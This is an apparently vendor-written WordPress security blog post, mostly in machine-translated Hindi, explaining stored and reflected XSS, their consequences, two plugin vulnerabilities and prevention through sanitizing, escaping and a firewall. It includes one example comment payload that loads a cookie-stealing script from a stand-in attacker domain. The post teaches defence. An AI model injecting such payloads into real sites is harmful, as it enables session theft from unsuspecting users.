WordPress XSS हमले के लक्षण
XSS भेद्यता सबसे अधिक देखी जाने वाली कमजोरियों में से एक है, फिर भी उन्हें सबसे अधिक अनदेखा किया जाता है। XSS एक साइबर दोष है जो उपयोगकर्ताओं (या उपयोगकर्ताओं के रूप में हैकर्स) को दुर्भावनापूर्ण कोड को एक पृष्ठ में डालने की अनुमति देता है जिससे मनमाने इनपुट की अनुमति मिलती है। XSS कारनामों को संग्रहीत और प्रतिबिंबित में वर्गीकृत किया गया है।- संग्रहीत क्रॉस-साइट स्क्रिप्टिंग इसका मतलब है कि हैकर ने एक दुर्भावनापूर्ण स्क्रिप्ट को एक संवेदनशील पृष्ठ में इंजेक्ट किया है, जो हर बार किसी अनजान पीड़ित द्वारा संक्रमित पृष्ठ पर जाने पर चलाया जाता है।
- प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग यह तब होता है जब एक हमलावर एक HTTP अनुरोध के अंदर दुर्भावनापूर्ण कोड डालता है और इंजेक्शन पेलोड को प्रतिक्रिया में शामिल किया जाता है और इसके निष्पादन को रोकने के लिए कोई सुरक्षा उपाय नहीं किया जाता है। जो चीज रिफ्लेक्टेड एक्सएसएस को अलग बनाती है, वह यह है कि इंजेक्टेड पेलोड वेब एप्लिकेशन पर कहीं भी संग्रहीत नहीं होता है।
- Hacker (H) आपकी वेबसाइट पर एक अकाउंट बनाता है।
- H ने देखा कि आपकी वेबसाइट में एक संग्रहीत XSS भेद्यता है। यदि कोई व्यक्ति HTML टैग्स वाली कोई टिप्पणी पोस्ट करता है, तो टैग वैसे ही प्रदर्शित होंगे, और कोई भी स्क्रिप्ट टैग चलने लगेंगे।
- एक लेख के टिप्पणी अनुभाग में, एच एक स्क्रिप्ट टैग के साथ पाठ सम्मिलित करता है जैसे:
I am in love with your website <script src="https://mallorysevilsite.com/authstealer.js">
- जब कोई उपयोगकर्ता (यू) टिप्पणी के साथ पृष्ठ को लोड करता है, तो स्क्रिप्ट टैग चलता है और यू की प्राधिकरण कुकी चुरा लेता है
- चोरी की गई कुकी एच के गुप्त सर्वर को भेजी जाती है जिससे वह अनजान उपयोगकर्ता यू का प्रतिरूपण करने में सक्षम हो जाता है।
WordPress XSS अटैक के परिणाम
XSS कारनामे आपको अपनी वेबसाइट से लॉक करवा सकते हैं। इसका उपयोग आपको प्रतिरूपित करने और आपके ब्रांड की छवि को धूमिल करने के लिए भी किया जा सकता है। XSS भेद्यता का फायदा उठाकर हैकर्स क्या करने में सक्षम हैं, इसकी एक अंतहीन सूची है। यहां उनमें से कुछ हैं।चोरी की गई कुकीज़
कुकी चोरी XSS भेद्यता का एक सामान्य शोषण है। कुकीज़ छोटी फाइलें होती हैं जो उपयोगकर्ता और वेबसाइट के लिए विशिष्ट डेटा रखती हैं। एक वैध उपयोगकर्ता के रूप में प्रतिरूपण करने के लिए हैकर चोरी की कुकीज़ का उपयोग कर सकते हैं और दुर्भावनापूर्ण इरादे के लिए पहुंच का उपयोग कर सकते हैं।समझौता पासवर्ड
पासवर्ड प्रबंधक उपयोगकर्ताओं के लिए विभिन्न वेबसाइटों के खातों का प्रबंधन करना सुविधाजनक बनाते हैं। पासवर्ड प्रबंधक उपयोगकर्ताओं के लिए पासवर्ड स्वतः भरते हैं। पासवर्ड इनपुट बनाने के लिए हैकर्स भेद्यता का उपयोग कर सकते हैं। जब पासवर्ड मैनेजर ऑटो पासवर्ड भरता है तो हैकर पासवर्ड को पढ़ लेता है और उसे अपने डोमेन पर भेज देता है। अब, हैकर एक वैध उपयोगकर्ता के रूप में पोज दे सकता है और आपकी वेबसाइट की जानकारी तक पहुंच प्राप्त कर सकता है।पोर्ट स्कैन
XSS का उपयोग कमजोर वेबसाइट पर जाने वाले किसी भी व्यक्ति के स्थानीय नेटवर्क पर पोर्ट स्कैन चलाने के लिए भी किया जा सकता है। यदि नेटवर्क तक पहुंच प्राप्त हो जाती है, तो हमलावर नेटवर्क पर अन्य उपकरणों को हैक कर सकता है। ऐसे हमलों को अंजाम देने के लिए हमलावर कोड इंजेक्ट करते हैं जो आंतरिक नेटवर्क को स्कैन करता है और हमलावर को रिपोर्ट करता है।क्रॉस-साइट अनुरोध जालसाजी
क्रॉस-साइट अनुरोध जालसाजी (सीएसआरएफ) हमलावरों को अवांछित कार्यों को निष्पादित करने के लिए अंतिम उपयोगकर्ताओं को मजबूर करने की क्षमता प्रदान करता है। वेबसाइट के प्रकार के आधार पर हमलावर कनेक्शन का अनुरोध कर सकता है, संदेश भेज सकता है, लॉग-इन क्रेडेंशियल बदल सकता है, क्रिप्टोकुरेंसी स्थानांतरित कर सकता है या स्रोत कोड भंडार में पिछले दरवाजे को प्रतिबद्ध कर सकता है।कीलॉगर
कीबोर्ड कैप्चरिंग करने के लिए जावास्क्रिप्ट का उपयोग किया जा सकता है। जावास्क्रिप्ट कोडर्स को एक संवेदनशील पृष्ठ पर उपयोगकर्ता द्वारा किए गए कीस्ट्रोक्स को लॉग करने की क्षमता प्रदान करता है। कुछ व्यावसायिक वेब साइटों ने कुछ कोड उपलब्ध कराए हैं जिनका उपयोग क्लिक, मोबाइल जेस्चर या इनपुट के रूप में विज़िटर की गतिविधियों को लॉग करने के लिए किया जा सकता है। ये दुष्ट प्राणियों के हाथ में विनाशकारी साबित हो सकते हैं।WordPress XSS अटैक के उदाहरण
XSS सबसे आम भेद्यता है जो हर साल हजारों वेबसाइटों में दुर्भावनापूर्ण अभिनेताओं को पिछले दरवाजे से प्रवेश प्रदान करती है। ये वर्डप्रेस एक्सएसएस शोषण के कुछ हालिया उदाहरण हैं।Slimstat प्लगइन का शोषण (मई 2019)
स्लिमस्टैट एक लोकप्रिय वेब एनालिटिक्स प्लग-इन है जिसे हाल ही में संग्रहीत XSS भेद्यता के लिए असुरक्षित पाया गया था। स्लिमस्टैट का उपयोग वास्तविक समय में वेबसाइट एनालिटिक्स पर नज़र रखने के लिए किया जाता है, यह एक्सेस लॉग के आंकड़ों की निगरानी और रिपोर्ट करता है, ग्राहकों और पंजीकृत उपयोगकर्ताओं, जावास्क्रिप्ट घटनाओं आदि को लौटाता है। कल्पना करें कि हैकर भेद्यता का फायदा उठाकर वेबसाइट डेटा की मात्रा तक पहुंच सकता है। भेद्यता 4.8 और उससे नीचे के संस्करणों में मौजूद थी। यह किसी भी अनधिकृत आगंतुक को प्लगइन एक्सेस लॉग कार्यक्षमता पर मनमाने ढंग से जावास्क्रिप्ट कोड इंजेक्ट करने की अनुमति देता है। Websites that were using the latest version of WordPress and were under the protection of Astra WAF were safe from the attackers.Read more here:Popular plug-in Slimstat, vulnerable to XSSFacebook Messenger Live Chat
A persistent XSS vulnerability in FB messenger live chat by Zotabox was uncovered. Through WordPress, AJAX functionality makes it simple to send and receive data to and from the script without needing to reload the page. The functionupdate_zb_fbc_code
is accessible to anyone.The function wp_ajax_update_zb_fbc_code
is prescribed for authorized users only &wp_ajax_nopriv_update_zb_fbc_code
is for non-privileged users. Both use the same function “update_zb_fbc_code
". This allows any user (logged in or not) to modify the plugin settings. Malicious actors could use this vulnerability to gain higher priority access to confidential information. Read more here:Critical XSS vulnerability in Facebook Messenger Live Chat Prevention of XSS Attack in WordPress
Taking security for granted will cost you very dearly in today’s cyber-lithic age. A strong sanitizing and validating system can protect your website from the exploit of the kinds of XSS and CSRF etc. Read on to find more about it.Update WordPress files
The fastest and easiest way to solve the vulnerability issues related to WP v5.11 and below is to update WordPress to the latest version.Validate input
Examine and validate all input data before sending it to the server. Accept input only from validated, trusted users. For example:Follow the following function to validate email-id inputted by the user.Filter_var PHP Function
Filter_var($_GET[‘email’], FILTER_VALIDATE_EMAIL)
is_email
Sanitize Data
Sanitizing data input by the user is highly recommended on sites that allow HTML markup. You can make sure that the data does no harm to either your users or your database by cleaning the data of potentially harmful markup. WordPress has great features to filter out unreliable data entries. Here is a list of WP commands you can use to sanitize your data.sanitize_email
sanitize_file_name
sanitize_text_field
esc_url_raw
sanitize_option
sanitize_key
sanitize_mime_type
wp_kses
Sanitize_meta
Escape data
Escaping data means ensuring data security by censoring the data entered. It ensures that the key characters in the data are not misinterpreted in a malicious manner. The five basic escaping functions that WordPress provides are:esc_html
esc_url
esc_js
esc_attr
esc_textarea
Encode data on output
Encode all HTTP response that outputs the data entered by the user. This would prevent it from being interpreted as active content. Encoding is merely converting every character to its HTML entity name. You can use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in an intended manner.Use a web application firewall
Having a security guard on your website always helps. WAF or Web Application Firewalls provide security against potential vulnerabilities. Astra WAF filters malicious traffic and provides intelligent protection to your website. It blocks XSS, SQLi, CSRF, bad bots, OWASP top 10 &100+ other cyber attacks. Our intelligent firewall detects visitor patterns on your website &automatically blocks hackers with malicious intent.